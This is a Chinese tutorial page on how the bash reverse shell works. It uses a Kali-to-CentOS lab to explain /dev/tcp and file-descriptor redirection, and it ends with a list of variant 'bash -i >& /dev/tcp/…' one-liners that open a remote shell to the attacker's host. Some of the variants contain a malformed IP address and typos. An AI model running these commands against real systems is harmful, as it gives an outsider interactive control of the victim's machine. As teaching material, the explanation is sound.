溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Linux之bash反彈shell原理是什么

發(fā)布時間:2021-05-10 14:39:28 來源:億速云 閱讀:298 作者:小新 欄目:開發(fā)技術

這篇文章將為大家詳細講解有關Linux之bash反彈shell原理是什么,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

什么是Linux系統(tǒng)

Linux是一種免費使用和自由傳播的類UNIX操作系統(tǒng),是一個基于POSIX的多用戶、多任務、支持多線程和多CPU的操作系統(tǒng),使用Linux能運行主要的Unix工具軟件、應用程序和網絡協(xié)議。

環(huán)境

攻擊機:kali            ip:192.168.25.144

靶    機:centos      ip:192.168.25.142

過程

kali 監(jiān)聽本地8888端口

Linux之bash反彈shell原理是什么

靶機 centos 寫入 反彈shell 的命令

bash -i >& /dev/tcp/192.168.25.144/8888 0>&1

Linux之bash反彈shell原理是什么

攻擊機 kali 成功反彈shell

Linux之bash反彈shell原理是什么

原理

反彈shell往往是在攻擊者無法直接連接受害者的情況下進行的操作,原因有很多,例如目標是局域網,或者開啟防火墻的某些策略等情況,而這時,我們就可以讓受害者主動向攻擊者發(fā)起連接,被控端發(fā)起請求到控制端某端口,并將其命令行的輸入輸出轉到控制端,從而實現(xiàn)交互

我們將命令拆開

bash -i
/dev/tcp/192.168.25.144/8888
 >&  0>&1

bash

Linux中一般默認的shell是bash,它功能幾乎可以涵蓋shell所具有的功能,所以一般的shell腳本都會指定它為執(zhí)行路徑

常用的shell有  ash、bash、dash、ksh、csh、zsh 等,不同的shell都有自己的特點以及用途

查詢當前shell命令    ls -l /bin/sh

Linux之bash反彈shell原理是什么

Linux之bash反彈shell原理是什么

bash -i  打開一個交互式的bash            shell 如果有 -i 參數(shù),就是交互式的

交互的意思就是可以和用戶進行交互,輸入命令,回顯給用戶就是一個交互的過程,而執(zhí)行一個shell腳本就是非交互的

使用命令  echo $-  可以查看是否是交互式shell

Linux之bash反彈shell原理是什么     

有參數(shù)  i ,是交互式的

執(zhí)行一個shell腳本

Linux之bash反彈shell原理是什么 

無參數(shù) i ,非交互式

/dev目錄

dev是設備(device)的英文縮寫。這里主要存放與設備(包括外設)有關的文件,Linux一切皆文件

 /dev/tcp/是Linux中的一個特殊設備,打開這個文件就相當于發(fā)出了一個socket調用,建立一個socket連接,讀寫這個文件就相當于在這個socket連接中傳輸數(shù)據。同理,Linux中還存在/dev/udp/

/dev/tcp/192.168.25.144/8888

所以上述命令就是和192.168.25.144:8888建立TCP連接

文件描述符

Linux 系統(tǒng)中,把一切都看做是文件,當進程打開現(xiàn)有文件或創(chuàng)建新文件時,內核向進程返回一個文件描述符,文件描述符就是內核為了高效管理已被打開的文件所創(chuàng)建的索引,用來指向被打開的文件。

所有執(zhí)行I/O操作的系統(tǒng)調用都會通過文件描述符,即文件描述符可控制輸入輸出(輸入/輸出重定向)

標準輸入(stdin):           代碼為  0     使用 < 或 <<          默認設備鍵盤

標準輸出(stdout):         代碼為  1     使用 > 或 >>          默認設備顯示器

標準錯誤輸出(stderr):  代碼為   2    使用 2> 或 2>>      默認設備顯示器

 ---    +--------+
( 0 ) ---->|dev/tty0|  當開啟一個終端時 默認的文件描述符 指向 /dev/tty0(虛擬終端)
 ---    +--------+ 
             
 ---    +--------+ 
( 1 ) ---->|dev/tty0| 
 ---    +--------+  
   	    	    
 ---    +--------+ 
( 2 ) ---->|dev/tty0| 
 ---    +--------+

大多數(shù)Linux 系統(tǒng)命令從你的終端接受輸入并將所產生的輸出發(fā)送回到您的終端。一個命令通常從一個叫標準輸入的地方讀取輸入,默認情況下,這恰好是你的終端。同樣,一個命令通常將其輸出寫入到標準輸出,默認情況下,這也是你的終端

Linux之bash反彈shell原理是什么

Shell 輸入/輸出重定向

我們讓上圖  輸出重定向

使用    1>    將輸出結果寫入到 指定文件中    文件不存在則創(chuàng)建文件,文件如果存在會覆蓋原文件內容

省略不寫則默認就是 1       同理,輸入重定向  0<   省略不寫則默認就是 0

Linux之bash反彈shell原理是什么

Linux之bash反彈shell原理是什么

使用  >>   會追內容在文件末尾

Linux之bash反彈shell原理是什么

結合上面建立的TCP連接

Linux之bash反彈shell原理是什么

Linux之bash反彈shell原理是什么

kali攻擊機收到

Linux之bash反彈shell原理是什么

結合bash -i

Linux之bash反彈shell原理是什么

Linux之bash反彈shell原理是什么

在kali得到命令執(zhí)行結果的回顯

Linux之bash反彈shell原理是什么

此時我們輸入name,可以看到,標準輸出錯誤并未被重定向

Linux之bash反彈shell原理是什么

 ---    +--------+
( 0 ) ---->|dev/tty0|
 ---    +--------+ 
            
 ---    +--------+      +------------------+
( 1 ) ---->|dev/tty0|  ---->  |/dev/tcp/host/port|
 ---    +--------+      +------------------+
   	    	    
 ---    +--------+ 
( 2 ) ---->|dev/tty0| 
 ---    +--------+

輸入重定向

Linux之bash反彈shell原理是什么

Linux之bash反彈shell原理是什么

在kali攻擊機,輸入

Linux之bash反彈shell原理是什么

靶機得到輸入指令,標準輸出(默認終端)

Linux之bash反彈shell原理是什么

 ---    +--------+
( 0 ) ---->|dev/tty0|
 ---    +--------+ 
            
 ---    +--------+      +------------------+
( 1 ) ---->|dev/tty0|  ---->  |/dev/tcp/host/port|
 ---    +--------+      +------------------+
   	    	    
 ---    +--------+ 
( 2 ) ---->|dev/tty0| 
 ---    +--------+

?。。。。。。。。。。。。。?!

此時,我們只需要將

bash i  > /dec/tcp/192.168.25.144/8888  和   bash i  <  /dec/tcp/192.168.25.144/8888  結合

實現(xiàn)在攻擊機 kali 輸入 命令,在kali 機 得到命令回顯,實現(xiàn)了反彈shell

即 使用下面的命令

bash -i > /dev/tcp/192.168.25.144/8888 0>&1

效果     kali   ip:192.168.25.140 

Linux之bash反彈shell原理是什么

Linux之bash反彈shell原理是什么

此時靶機會輸出在攻擊機所輸入的命令,還有一個問題,標準錯誤輸出 并沒有重定向

Linux之bash反彈shell原理是什么

Linux之bash反彈shell原理是什么

補充:

bash 在執(zhí)行一條指令的時候,首先會檢查命令中存不存在重定向的符號,如果存在那么首先將文件描述符重定向,存在多個則從左往右依次執(zhí)行

標準輸出與標準錯誤輸出重定向

此時反彈shell語句里邊用到了  >&    操作符,>&  操作符在不同情況下有不通的含義

在   >&word  語法中,當word是數(shù)字或  字符時,操作符  >&   表示復制 文件描述符 

    而文件描述符的復制格式有     num1<&num2  和 num1>&num2 

    這里兩個都是將文件描述符 num1 復制到 num2 ,兩者的區(qū)別是,前者是以只讀的形式打開,后者是以寫的形式打開

    因此 num1<&num2  和 num1>&num2 是等價的(讀/寫方式打開對其沒有任何影響)

    所以上述命令可以修改為     bash -i > /dev/tcp/192.168.25.144/8888 0<&1

   所以    0>&1  或者   0<&1

   是對文件描述符的拷貝,是將0[標準輸入]重定向到了1[標準輸出]指向的位置

   此時1[標準輸出]指向的是socket連接文件(第一個  >   ),

   重定向完成后,0[標準輸入]也指向了socket連接文件,所以我推測因為拷貝,所以原標準輸出回顯到靶機上(kali上敲的命  令)

 ---    +--------+
( 0 ) ---->|dev/tty0|\
 ---    +--------+ \
            \
 ---    +--------+  ---->  +------------------+
( 1 ) ---->|dev/tty0|  ---->  |/dev/tcp/host/port|
 ---    +--------+      +------------------+
   	    	    
 ---    +--------+ 
( 2 ) ---->|dev/tty0| 
 ---    +--------+

此時標準錯誤輸出 依然未曾改變

在   >&word  語法中,當word不是數(shù)字或  -  字符時    >&  表示將 標準錯誤輸出合并到標準輸出中

     此時與操作符   &> 功能一樣     >&word 等價于 &> word       都相當于        > word  2>&1 

    當執(zhí)行 bash -i  > /dev/tcp/192.168.25.140/9999 0>&1   命令時,效果如下 標準輸出錯誤并未被重定向

Linux之bash反彈shell原理是什么 

    所以我們執(zhí)行命令   bash -i  > /dev/tcp/192.168.25.140/9999 0>&1 2>&1   或

    bash -i  >& /dev/tcp/192.168.25.140/9999 0>&1       均形成了一個閉合的回路  ,同樣,命令回顯到攻擊機上

Linux之bash反彈shell原理是什么   

  實現(xiàn)以下效果形成閉合,即可反彈shell ,而其他一些反彈命令,只要可以形成如下效果即可

 ---    +--------+
( 0 ) ---->|dev/tty0|\
 ---    +--------+ \
            \
 ---    +--------+  ---->  +------------------+
( 1 ) ---->|dev/tty0|  ---->  |/dev/tcp/host/port|
 ---    +--------+  ---->  +------------------+
   	    	    /
 ---    +--------+ /
( 2 ) ---->|dev/tty0| / 
 ---    +--------+
bash -i >& /dev/tcp/192.168.146.25.144/8888 <&1
bash -i >& /dev/tcp/192.168.146.25.144/8888 <&2
bash -i >& /dev/tcp/192.168.146.25.144/8888 0<&1
bash -i >& /dev/tcp/192.168.146.25.144/8888 0<&2
bash -i >& /dev/tcp/192.168.146.25.144/8888 0>&1
bash -i >& /dev/tcp/192.168.146.25.144/8888 0>&2
bash -i > /dev/tcp/192.168.25.144/8888 0>&1 2>&1

關于“Linux之bash反彈shell原理是什么”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI